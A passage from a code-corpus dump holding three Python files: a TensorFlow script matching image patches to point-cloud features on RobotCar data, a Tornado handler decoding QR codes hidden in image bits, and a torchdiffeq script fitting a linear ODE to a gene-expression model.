print(\"------ Error reading sift test batch!\")\n return None\n \n # read batch\n data = Data(batch_size, image_size, pcl_size, None, None)\n list_batch = sift_test_list[start_id:end_id]\n for i in range(len(list_batch)):\n img = cv2.imread(list_batch[i])\n img = data.img_augmentation(img)\n img_batch[i,:,:,:] = img\n \n return img_batch\n\ndef getISSTestBatch(iss_test_list, batch_id):\n pos_pcl_batch = np.zeros([batch_size, pcl_size, 3], np.float32)\n start_id = batch_id * batch_size\n end_id = (batch_id + 1) * batch_size \n \n if (end_id > len(iss_test_list)):\n print(\"------ Error reading sift test batch!\")\n return None\n \n # read batch\n data = Data(batch_size, image_size, pcl_size, None, None)\n list_batch = iss_test_list[start_id:end_id]\n for i in range(len(list_batch)):\n pos_pcl = data.read_pcd(list_batch[i])\n # > 1024 points\n if pos_pcl.shape[0] > pcl_size:\n random_id = np.random.permutation(pos_pcl.shape[0])\n pos_pcl_batch[i, :, :] = pos_pcl[random_id[0:pcl_size]]\n else:\n pos_pcl_batch[i, 0:pos_pcl.shape[0], :] = pos_pcl \n \n return pos_pcl_batch\n \n\ndef test(load_version, sift_test_list, iss_test_list, submap_id):\n print ('----------------- START to test -----------------')\n \n #sift_test_list = sift_test_list[submap_id-1][submap_image_id-1]\n iss_test_list = iss_test_list[submap_id-1]\n iss_test_file = \"iss_test_list_txt/%03d.txt\" % submap_id \n with open(iss_test_file, 'w') as file:\n for i in range(len(iss_test_list)):\n file.write('%s\\n' % iss_test_list[i])\n \n # define placeholder\n image_pl = tf.placeholder(tf.float32, shape=[batch_size, image_size, image_size, 3])\n pos_pcl_pl = tf.placeholder(tf.float32, shape=[batch_size, pcl_size, 3])\n neg_pcl_pl = tf.placeholder(tf.float32, shape=[batch_size, pcl_size, 3])\n \n is_training = tf.placeholder(tf.bool)\n \n # build model\n print ('build model')\n with tf.device('/gpu:0'): # use gpu 1 to forward\n with tf.variable_scope('image_branch') as scope:\n image_feature = vgg16(image_pl, is_training=True, output_dim=image_feature_dim,\n bn_decay=None)\n \n with tf.variable_scope('pointcloud_branch') as scope:\n pos_pcl_feature,_ = pointNet(pos_pcl_pl, pcl_feature_dim, is_training=is_training, \n use_bn=False, bn_decay=None)\n scope.reuse_variables()\n neg_pcl_feature,_ = pointNet(neg_pcl_pl, pcl_feature_dim, is_training=is_training, \n use_bn=False, bn_decay=None)\n\n saver = tf.train.Saver(tf.all_variables(), max_to_keep=None) # tf.global_variables\n\n # run model\n print('run model...')\n config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n config.gpu_options.per_process_gpu_memory_fraction = 0.9\n with tf.Session(config=config) as sess:\n \n print('initialise model...')\n sess.run(tf.global_variables_initializer())\n print(' load model...')\n save_path = 'model/' + 'v2' + '/' + load_version +'_model.ckpt'\n saver.restore(sess, save_path)\n #restore_tf_model(sess)\n print(\" Model loaded from: %s\" % save_path)\n \n # -------------------- evaluate model ---------------------\n print('**** Validate ...')\n print(' Compute image and pcl descriptors')\n \n\n iss_batch_num = len(iss_test_list) // batch_size \n iss_test_num = iss_batch_num * batch_size \n \n pcl_feature = np.zeros([iss_test_num, pcl_feature_dim]) \n \n # feed iss test list into the network\n batch_counter = 0\n print('-------- test iss --------------')\n for i in range(iss_batch_num):\n print(\" *** iss progress: %d/%d\" % (i, iss_batch_num))\n pcl_batch = getISSTestBatch(iss_test_list,i)\n feed_dict = {pos_pcl_pl:pcl_batch, is_training: False}\n pcl_batch_feature = sess.run(pos_pcl_feature, feed_dict=feed_dict)\n pcl_feature[batch_counter: batch_counter+pcl_batch_feature.shape[0],:] = pcl_batch_feature\n batch_counter += pcl_batch_feature.shape[0] \n \n print('---------- test sift ----------')\n sift_submap_test_list = sift_test_list[submap_id-1] # all images\n for k in range(len(sift_submap_test_list)):\n sift_test_list = sift_submap_test_list[k] # image id: i+1 \n cam_id = sift_test_list[0].split('/')[-2] # expected 'cam1_xxx'\n # record test_list for checking\n sift_test_file = \"sift_test_list_txt/%03d_%s.txt\" % (submap_id, cam_id)\n with open(sift_test_file, 'w') as file:\n for i in range(len(sift_test_list)):\n file.write('%s\\n' % sift_test_list[i])\n \n # test the patches from one image in the submap\n sift_batch_num = len(sift_test_list) // batch_size\n sift_test_num = sift_batch_num * batch_size\n img_feature = np.zeros([sift_test_num, image_feature_dim])\n \n # feed sift test list into the network\n batch_counter = 0\n print(\" *** image id: %d/%d\" % (k,len(sift_submap_test_list)))\n for i in range(sift_batch_num):\n #print(\" *** image id: %d/%d, batch id: %d/%d\" % (k, len(sift_submap_test_list), i, sift_batch_num))\n img_batch = getSIFTTestBatch(sift_test_list, i)\n #print img_batch.shape\n feed_dict = {image_pl:img_batch, is_training: False}\n img_batch_feature = sess.run(image_feature, feed_dict=feed_dict)\n #print type(img_batch_feature)\n img_feature[batch_counter: batch_counter+img_batch_feature.shape[0],:] = img_batch_feature\n batch_counter += img_batch_feature.shape[0] \n \n # compute distance array between img_feature and pcl_feature\n img_vec = np.sum(np.multiply(img_feature, img_feature), axis=1, keepdims=True)\n pcl_vec = np.sum(np.multiply(pcl_feature, pcl_feature), axis=1, keepdims=True)\n dist_array = img_vec + np.transpose(pcl_vec) - 2*np.matmul(img_feature, np.transpose(pcl_feature))\n print(\" image patch num: %d, submap pcl num: %d\" % (dist_array.shape[0], dist_array.shape[1]))\n \n # find correspondences and record\n # img_pcl_correspondences = [];\n cam_id = sift_test_list[0].split('/')[-2]\n txt_folder = \"%s/%03d\" % (sift_iss_correspond_dir, submap_id)\n if not os.path.exists(txt_folder):\n os.makedirs(txt_folder)\n txt_file_path = \"%s/%s.txt\" % (txt_folder, cam_id)\n top_k = 10\n with open(txt_file_path, \"w\") as file:\n for i in range(dist_array.shape[0]):\n #min_dist_id = np.argmin(dist_array[i,:])\n min_dist_id = np.argsort(dist_array[i,:])[:top_k]\n idx = np.concatenate((np.array([i+1]), min_dist_id+1))\n #print(idx)\n idx=idx.reshape(1, idx.shape[0])\n np.savetxt(file, idx,fmt='%d')\n \nif __name__ == '__main__':\n \n load_version = 'v1_2_1000'\n \n# date_time = '2014-07-14-15-16-36'\n \n submap_id = 119 #116-121\n \n sift_test_root = '/media/mengdan/data3/robotcar/grasshopper/sift_patch_test/' + date_time + '/'\n iss_test_root = '/media/mengdan/data3/robotcar/grasshopper/iss_volume_test/' + date_time + '/' \n\n # read test data\n sift_test_list, iss_test_list = readTestData(sift_test_root, iss_test_root) \n # test \n test(load_version, sift_test_list, iss_test_list, submap_id)\n ", "sub_path": "code_network/test_256.py", "file_name": "test_256.py", "file_ext": "py", "file_size_in_byte": 10662, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.listdir", "line_number": 68, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 71, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 74, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 83, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 95, "usage_type": "attribute"}, {"api_name": "read_dataset.Data", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 114, "usage_type": "attribute"}, {"api_name": "read_dataset.Data", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 129, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 148, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 148, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 149, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 150, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.device", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 157, "usage_type": "call"}, {"api_name": "vgg16.vgg16", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 161, "usage_type": "call"}, {"api_name": "pointNet.pointNet", "line_number": 162, "usage_type": "call"}, {"api_name": "pointNet.pointNet", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 168, "usage_type": "attribute"}, {"api_name": "tensorflow.all_variables", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.ConfigProto", "line_number": 172, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 175, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 238, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 256, "usage_type": "call"}]} +{"seq_id": "598177257", "text": "import tornado.ioloop\nimport tornado.web\nimport qrcode\nimport json\nimport pybase64\nimport math\nimport io\nfrom PIL import Image\nfrom pyzbar.pyzbar import decode\nfrom PIL.PngImagePlugin import PngImageFile, PngInfo\nimport random\n\nSETTING_BITS_NUM = 2500\nCONFIG_QRCODE_WIDTH = 46\n\nclass DataExtractor(tornado.web.RequestHandler):\n\t# CORS_ORIGIN = '*'\n\t# CORS_HEADERS = 'Content-Type'\n\t# CORS_METHODS = 'POST'\n\t\n\tdef set_default_headers(self):\n\t\tself.set_header(\"Access-Control-Allow-Origin\", \"*\")\n\t\tself.set_header(\"Access-Control-Allow-Headers\", \"x-requested-with\")\n\t\tself.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')\n\t\t\n\t# extract a single bit from the rgb value\n\tdef extract_qrcode_bit(self, rgbH, pageNum):\n\t\trH, gH, bH = rgbH\n\t\tpixelBit = '1'\n\t\tif pageNum == 0:\n\t\t\tpixelBit = rH[7:8]\n\t\telif pageNum == 1:\n\t\t\tpixelBit = rH[6:7]\n\t\telif pageNum == 2:\n\t\t\tpixelBit = gH[7:8]\n\t\telif pageNum == 3:\n\t\t\tpixelBit = gH[6:7]\n\t\telif pageNum == 4:\n\t\t\tpixelBit = bH[7:8]\n\t\telif pageNum == 5:\n\t\t\tpixelBit = bH[6:7]\n\t\t\t# the final value of this pixel\n\t\t\t# print(pixelBit, 'pixelBit == 0', pixelBit == '0', 'pixelBit == 1', pixelBit == '1')\n\t\treturn pixelBit\t\t\n\n\t# transform the int type to binary type\n\tdef __int_to_bin(self, rgb):\n\t\t\"\"\"Convert an integer tuple to a binary (string) tuple.\n\t\t:param rgb: An integer tuple (e.g. (220, 110, 96))\n\t\t:return: A string tuple (e.g. (\"00101010\", \"11101011\", \"00010110\"))\n\t\t\"\"\"\n\t\t# r, g, b, o = rgb\n\t\treturn ('{0:08b}'.format(rgb[0]),\n\t\t\t\t'{0:08b}'.format(rgb[1]),\n\t\t\t\t'{0:08b}'.format(rgb[2]))\t\n\n\t# judge whether the pixel is black\n\tdef is_black(self, qrcodePixel):\n\t\tisBlack = True\n\t\tfor i in range(len(qrcodePixel)):\n\t\t\tif qrcodePixel[i] == 255:\n\t\t\t\tisBlack = False\n\t\t\t\tbreak\n\t\treturn isBlack\n\n\t# judge whether the pixel is white\n\tdef is_white(self, qrcodePixel):\n\t\tisWhite = True\n\t\tfor i in range(len(qrcodePixel)):\n\t\t\tif qrcodePixel[i] == 0:\n\t\t\t\tisWhite = False\n\t\t\t\tbreak\n\t\treturn isWhite\n\n\t# extract the bit list from host image\n\tdef extract_qrcode_bit_list(self, hostImage, hostImageHideChannel):\n\t\thostImageWidth = hostImage.size[0]\n\t\thostImageHeight = hostImage.size[1]\n\t\thostImageMap = hostImage.load()\n\t\tqrCodeBitList = []\n\t\tfor i in range(hostImageHideChannel):\n\t\t\tfor j in range(hostImageWidth):\n\t\t\t\tfor k in range(hostImageHeight):\n\t\t\t\t\trgbH = self.__int_to_bin(hostImageMap[j, k])\n\t\t\t\t\tqrcodeBit = int(self.extract_qrcode_bit(rgbH, i))\n\t\t\t\t\tqrCodeBitList.append(qrcodeBit)\n\t\treturn qrCodeBitList\n\n\t# parse the string information from the Qrcode image list\n\tdef parse_encoding_str(self, extractQrcodeImgList):\n\t\tparseEncodingStr = ''\n\t\tfor i in range(len(extractQrcodeImgList)):\n\t\t\tqrcodeImg = extractQrcodeImgList[i]\n\t\t\tqrcodeImgResult = decode(qrcodeImg)\n\t\t\t# qrcodeImg.show()\n\t\t\tif (len(qrcodeImgResult) > 0):\n\t\t\t\tparseEncodingStr = parseEncodingStr + qrcodeImgResult[0].data.decode('utf-8')\n\t\treturn parseEncodingStr\n\n\t# assemble the qrcode image from the extracted bit list\n\tdef revert_qrcode_image_list(self, extractQrcodeImgBitList, qrCodeCellMaxLen, qrCodeCellNum, qrCodeNum):\n\t\tqrCodeSideLen = qrCodeCellMaxLen * qrCodeCellNum\n\t\tqrcodeImgList = []\n\t\tqrcodeBitIndex = 0\n\t\twholeQRcodeNum = math.floor(len(extractQrcodeImgBitList) / (qrCodeSideLen * qrCodeSideLen))\n\t\tprint('extractQrcodeImgBit length', len(extractQrcodeImgBitList), 'qrCodeSideLen', qrCodeSideLen)\n\t\tprint('qrCodeNum', qrCodeNum, 'wholeQrcodeNum', wholeQRcodeNum)\n\t\tif qrCodeNum > wholeQRcodeNum:\n\t\t\tqrCodeNum = wholeQRcodeNum\n\t\t# TODO\n\t\t# qrCodeNum = 1\n\t\tfor i in range(qrCodeNum):\n\t\t\tinitQRCodeImg = Image.new(mode = \"RGB\", size = (qrCodeSideLen, qrCodeSideLen))\n\t\t\tinitQRCodeImgMap = initQRCodeImg.load()\n\t\t\tfor j in range(qrCodeSideLen):\n\t\t\t\tfor k in range(qrCodeSideLen):\n\t\t\t\t\tif extractQrcodeImgBitList[qrcodeBitIndex] == 1:\n\t\t\t\t\t\tinitQRCodeImgMap[j, k] = (255, 255, 255)\n\t\t\t\t\telif extractQrcodeImgBitList[qrcodeBitIndex] == 0:\n\t\t\t\t\t\tinitQRCodeImgMap[j, k] = (0, 0, 0)\n\t\t\t\t\tqrcodeBitIndex += 1\n\t\t\t# initQRCodeImg.show()\n\t\t\t# qrcodeImgStr = decode(initQRCodeImg)\n\t\t\t# print('qrcodeImgStr', qrcodeImgStr)\n\t\t\tqrcodeImgList.append(initQRCodeImg)\n\t\treturn qrcodeImgList\n\n\t# correct the pixel color in the image\n\tdef correct_qrcode_image_list(self, extractQrcodeImgList, qrCodeCellMaxLen):\n\t\tfor i in range(len(extractQrcodeImgList)):\n\t\t\tqrcodeImg = extractQrcodeImgList[i]\n\t\t\tqrcodeImgMap = qrcodeImg.load()\n\t\t\tqrcodeImgWidth = qrcodeImg.size[0]\n\t\t\t# print('qrcodeImgWidth', qrcodeImgWidth)\n\t\t\tfor cellX in range(0, (qrcodeImgWidth), qrCodeCellMaxLen):\n\t\t\t\tfor cellY in range(0, (qrcodeImgWidth), qrCodeCellMaxLen):\n\t\t\t\t\tsumBlackBitNum = 0\n\t\t\t\t\tsumWhiteBitNum = 0\n\t\t\t\t\tcellColor = (255, 255, 255)\n\t\t\t\t\tfor localX in range(qrCodeCellMaxLen):\n\t\t\t\t\t\tfor localY in range(qrCodeCellMaxLen):\n\t\t\t\t\t\t\tpixelX = cellX + localX\n\t\t\t\t\t\t\tpixelY = cellY + localY\n\t\t\t\t\t\t\tif self.is_black(qrcodeImgMap[pixelX, pixelY]):\n\t\t\t\t\t\t\t\tsumBlackBitNum += 1\n\t\t\t\t\t\t\tif self.is_white(qrcodeImgMap[pixelX, pixelY]):\n\t\t\t\t\t\t\t\tsumWhiteBitNum += 1\n\t\t\t\t\t# correct bits in Qrcode\n\t\t\t\t\t# if sumWhiteBitNum != 0 and sumBlackBitNum != 0:\n\t\t\t\t\t# \t\tprint('sumWhiteBitNum', sumWhiteBitNum, 'sumBlackBitNum', sumBlackBitNum)\n\t\t\t\t\tif sumBlackBitNum > sumWhiteBitNum:\n\t\t\t\t\t\t# set black\n\t\t\t\t\t\tcellColor = (0, 0, 0)\n\t\t\t\t\telif sumBlackBitNum < sumWhiteBitNum:\n\t\t\t\t\t\t# set white\n\t\t\t\t\t\tcellColor = (255, 255, 255)\n\t\t\t\t\telse:\n\t\t\t\t\t\t# set the color (white or black) of this pixel randomly \n\t\t\t\t\t\tif random.random() > 0.5:\n\t\t\t\t\t\t\tcellColor = (0, 0, 0)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcellColor = (255, 255, 255)\n\t\t\t\t\t# set the pixel color of whole cell\n\t\t\t\t\tfor localX in range(qrCodeCellMaxLen):\n\t\t\t\t\t\tfor localY in range(qrCodeCellMaxLen):\n\t\t\t\t\t\t\tpixelX = cellX + localX\n\t\t\t\t\t\t\tpixelY = cellY + localY\n\t\t\t\t\t\t\tqrcodeImgMap[pixelX, pixelY] = cellColor\n\t\treturn extractQrcodeImgList\n\n\tdef assembleResultObj(self, messageType, message, extractStr=\"\"):\n\t\treturn {\n\t\t\t'type': messageType,\n\t\t\t'message': message,\n\t\t\t'extractStr': extractStr\n\t\t}\n\n\tdef get(self):\n\t\tself.write(\"Hello, world\")\n\n\tdef post(self):\n\t\tself.set_header(\"Access-Control-Allow-Origin\", \"*\")\n\t\tself.set_header(\"Access-Control-Allow-Headers\", \"x-requested-with\")\n\t\tself.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')\n\t\trequestBinary = self.request.body\n\t\trequestStr = requestBinary.decode()\n\t\timgdatahead, imgdatacontent = requestStr.split(\",\")\n\t\tprint('imgdatahead', imgdatahead)\n\t\t# extract the parameters from the imgdatahead\n\t\tqrCodeNum = 0\n\t\tqrCodeCellNum = 179\n\t\tqrCodeCellMaxLen = 2\n\t\t# store the qrcode data into the imagedatacontent\n\t\timgdata = pybase64.b64decode(imgdatacontent)\n\t\thostImage = Image.open(io.BytesIO(imgdata))\n\t\t# evaluate whether the image is suitable for decoding\n\t\t# if hasattr(hostImage, 'text'):\n\t\t# \tEmbedInfoObj = hostImage.text\n\t\t# \tprint('EmbedInfoObj', EmbedInfoObj)\n\t\t# \tif 'qrCodeNum' in EmbedInfoObj and 'qrCodeCellNum' in EmbedInfoObj and 'qrCodeCellMaxLen' in EmbedInfoObj:\n\t\t# \t\tqrCodeNum = int(EmbedInfoObj['qrCodeNum'])\n\t\t# \t\tqrCodeCellNum = int(EmbedInfoObj['qrCodeCellNum'])\n\t\t# \t\tqrCodeCellMaxLen = int(EmbedInfoObj['qrCodeCellMaxLen'])\n\t\t# \t\tprint('qrCodeNum', qrCodeNum, 'qrCodeCellNum', qrCodeCellNum, 'qrCodeCellMaxLen', qrCodeCellMaxLen)\n\t\t# \telse:\n\t\t# \t\tnotCompleteInfoMessage = 'The properties of this image are not complete.'\n\t\t# \t\tresultObj = self.assembleResultObj('error', notCompleteInfoMessage)\n\t\t# \t\tself.write(json.dumps(resultObj))\n\t\t# \t\treturn\n\t\t# else:\n\t\t# \tnotEmbedInfoMessage = 'The image does not embed other information.'\n\t\t# \tresultObj = self.assembleResultObj('error', notEmbedInfoMessage)\n\t\t# \tprint('resultObj', resultObj)\n\t\t# \tresultObjStr = json.dumps(resultObj)\n\t\t# \tself.write(resultObjStr)\n\t\t# \treturn\n\t\thostImageWidth = hostImage.size[0]\n\t\thostImageHeight = hostImage.size[1]\n\t\thostImageHideChannel = 6\n\t\t# the parsing part, extract the bit list of qrcode image from the host image\n\t\textractQrcodeImgBitList = self.extract_qrcode_bit_list(hostImage, hostImageHideChannel)\n\t\tprint('finish extract_qrcode_bit_list')\n\t\tconfigQrcodeBitSize = CONFIG_QRCODE_WIDTH * CONFIG_QRCODE_WIDTH\n\t\textractConfigQrcodeImgBitList = extractQrcodeImgBitList[:configQrcodeBitSize]\n\t\tprint('length', len(extractQrcodeImgBitList), 'CONFIG_QRCODE_WIDTH', CONFIG_QRCODE_WIDTH)\n\t\tqrcodeBorderWidth = 1\n\t\tconfigQrCodeModule = 1\n\t\tconfigQrCodeCellMaxLen = 2\n\t\t # the side length of the qrcode content plus the border width\n\t\tconfigQrCodeCellNum = (configQrCodeModule * 4 + 17) + qrcodeBorderWidth * 2\n\t\tconfigExtractQrcodeImgList = self.revert_qrcode_image_list(extractConfigQrcodeImgBitList, configQrCodeCellMaxLen, configQrCodeCellNum, 1)\n\t\tcorrectConfigExtractQrcodeImgList = self.correct_qrcode_image_list(configExtractQrcodeImgList, qrCodeCellMaxLen)\n\t\textractConfigStr = self.parse_encoding_str(correctConfigExtractQrcodeImgList)\n\t\tprint('extractConfigStr', extractConfigStr)\n\t\t[qrCodeNumStr, qrcodeModuleStr, qrCodeCellMaxLenStr] = extractConfigStr.split(' ')\n\t\tqrCodeNum = int(qrCodeNumStr)\n\t\tqrcodeModule = int(qrcodeModuleStr)\n\t\tqrCodeCellMaxLen = int(qrCodeCellMaxLenStr)\n\t\tqrCodeCellNum = (qrcodeModule * 4 + 17) + qrcodeBorderWidth * 2\n\t\tprint('qrCodeNum', qrCodeNum, 'qrCodeCellNum', qrCodeCellNum, 'qrCodeCellMaxLen', qrCodeCellMaxLen)\n\t\t#\n\t\tprint('length', len(extractQrcodeImgBitList))\n\t\textractContentQrcodeImgBitList = extractQrcodeImgBitList[SETTING_BITS_NUM:]\n\t\t# revert the qrcode image list from the qrcode image bit list\n\t\textractQrcodeImgList = self.revert_qrcode_image_list(extractContentQrcodeImgBitList, qrCodeCellMaxLen, qrCodeCellNum, qrCodeNum)\n\t\tprint('finish extract_qrcode_bit_list')\n\t\tcorrectedExtractQrcodeImgList = self.correct_qrcode_image_list(extractQrcodeImgList, qrCodeCellMaxLen)\n\t\tprint('finish qrcode correction')\n\t\t# extract the qrcode image to the inner string\n\t\textractStr = self.parse_encoding_str(extractQrcodeImgList)\n\t\tprint('finish parse_encoding_str')\n\t\tsuccessMessage = \"Extract the information from the image successfully!\"\n\t\t# print('extractStr', extractStr)\n\t\tresultObj = self.assembleResultObj('success', successMessage, extractStr)\n\t\tself.write(json.dumps(resultObj))\n\t\tprint('finish decoding')\n\t\treturn\n", "sub_path": "server/DataExtractor.py", "file_name": "DataExtractor.py", "file_ext": "py", "file_size_in_byte": 10066, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tornado.ioloop.web", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 16, "usage_type": "name"}, {"api_name": "pyzbar.pyzbar.decode", "line_number": 94, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 105, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 113, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 113, "usage_type": "name"}, {"api_name": "random.random", "line_number": 159, "usage_type": "call"}, {"api_name": "pybase64.b64decode", "line_number": 194, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 195, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 195, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 195, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 255, "usage_type": "call"}]} +{"seq_id": "338590950", "text": "import numpy as np\nimport torch\nimport os\nimport sys\nimport matplotlib.pyplot as plt\n#from torchdiffeq import odeint\nfrom torchdiffeq import odeint_adjoint as odeint\n\nsys.path.append('/home/cwildne/code/linear_memory')\nfrom linear_memory.linear_memory import LinearMemory\nimport linear_memory.utils as ut\nfrom import_utils import add_path\n\nadd_path('pyssa')\nimport pyssa.ssa as ssa\nimport pyssa.models.standard_models as sm\n\nadd_path('pymbvi')\nfrom pymbvi.models.mjp.autograd_partition_specific_models import SimpleGeneExpression\nfrom pymbvi.util import num_derivative, autograd_jacobian\n\ntorch.manual_seed(2007301620)\n\n# get simulation model\npre, post, rates = sm.get_standard_model(\"simple_gene_expression\")\n\n# prepare initial conditions\ninitial = np.array([0.0, 1.0, 0.0, 0.0])\ntspan = np.array([0.0, 3e3])\n\n# set up gene expression model\nmoment_initial = np.zeros(9)\nmoment_initial[0:3] = initial[1:4]\nmodel = SimpleGeneExpression(moment_initial, np.log(np.array(rates)), tspan)\n\n\nclass LinearODE(torch.nn.Module):\n\n def __init__(self, A, b):\n super(LinearODE, self).__init__()\n self.A = torch.nn.Parameter(A)\n self.b = torch.nn.Parameter(b)\n\n def forward(self, time, state):\n dydt = self.A @ state + self.b\n return(dydt)\n\n\n# get A for linear gene expression model\nrates = torch.tensor(rates).log()\nmoment_initial = torch.tensor(moment_initial)\ndef fun(state):\n tmp = model.forward_torch(0.0, state, torch.zeros(rates.shape), rates)\n return(tmp)\nA = autograd_jacobian(fun, moment_initial)\nb = fun(torch.zeros(moment_initial.shape))\nmodel = LinearODE(A, b)\n\n# compute true solution\nt_eval = torch.arange(tspan[0], tspan[1], 20)\nwith torch.no_grad():\n sol = odeint(model, moment_initial, t_eval)\n\n# reset model parameters\nmodel.A = torch.nn.Parameter(torch.zeros(model.A.shape))\nmodel.b = torch.nn.Parameter(torch.zeros(model.b.shape))\n\n# get data\nt_data = t_eval[0::15]\ndata = sol[0::15]\n\n# optimizer \nparams = model.parameters()\n#optimizer = torch.optim.SGD(params, lr=1e-10)\noptimizer = torch.optim.LBFGS(params, lr=1e-2)\n\ndef loss_fn(predict, data):\n predict = odeint(model, moment_initial, t_data)\n loss = torch.sum(((predict-data)/(data+1))**2)\n return(loss)\n\ndef loss_stat(model, data):\n mean = data.mean(axis=0)\n loss = torch.sum(model.forward(0.0, mean)**2)\n return(loss)\n\ndef l1(model):\n loss = 0.0\n for p in model.parameters():\n loss += torch.abs(p).sum()\n return(loss)\n\ndef l2(model):\n loss = 0.0\n for p in model.parameters():\n loss += torch.sum(p**2)\n return(loss)\n\ndef closure():\n if torch.is_grad_enabled():\n optimizer.zero_grad()\n loss = loss_fn(model, data) + 10*l1(model)\n if loss.requires_grad:\n try:\n loss.backward()\n except:\n print(\"Error during backpropgation\")\n return(loss)\n\n# fit\nmax_epoch = 500\nloss_history = []\nsave_path = os.path.dirname(os.path.realpath(__file__)) + '/data/learn_linear_ode_train.pt'\nmsg = 'Loss in epoch {0} is {1}'\nfor epoch in range(max_epoch):\n loss = optimizer.step(closure)\n loss_history.append(loss.item())\n with torch.no_grad():\n #loss1 = loss_stat(model, data)\n loss2 = 10*l1(model)\n print(msg.format(epoch, loss.item()))\n #print('Stationary loss is {}'.format(loss1))\n print('Parameter loss is {}'.format(loss2))\n # save\n torch.save({'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss_history': torch.tensor(loss_history)}, save_path)\nwith torch.no_grad():\n sol_final = odeint(model, moment_initial, t_eval)\n\n# # plot\n# for i in range(8):\n# plt.subplot(3, 3, i+1)\n# plt.plot(t_eval, sol[:, i], '-b')\n# plt.plot(t_eval, sol_final[:, i], '-r')\n# plt.plot(t_data, data[:, i], 'xk')\n# plt.show()\n", "sub_path": "examples/gene_expression/learn_linear_ode.py", "file_name": "learn_linear_ode.py", "file_ext": "py", "file_size_in_byte": 3870, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "import_utils.add_path", "line_number": 14, "usage_type": "call"}, {"api_name": "import_utils.add_path", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 22, "usage_type": "call"}, {"api_name": "pyssa.models.standard_models.get_standard_model", "line_number": 25, "usage_type": "call"}, {"api_name": "pyssa.models.standard_models", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "pymbvi.models.mjp.autograd_partition_specific_models.SimpleGeneExpression", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 50, 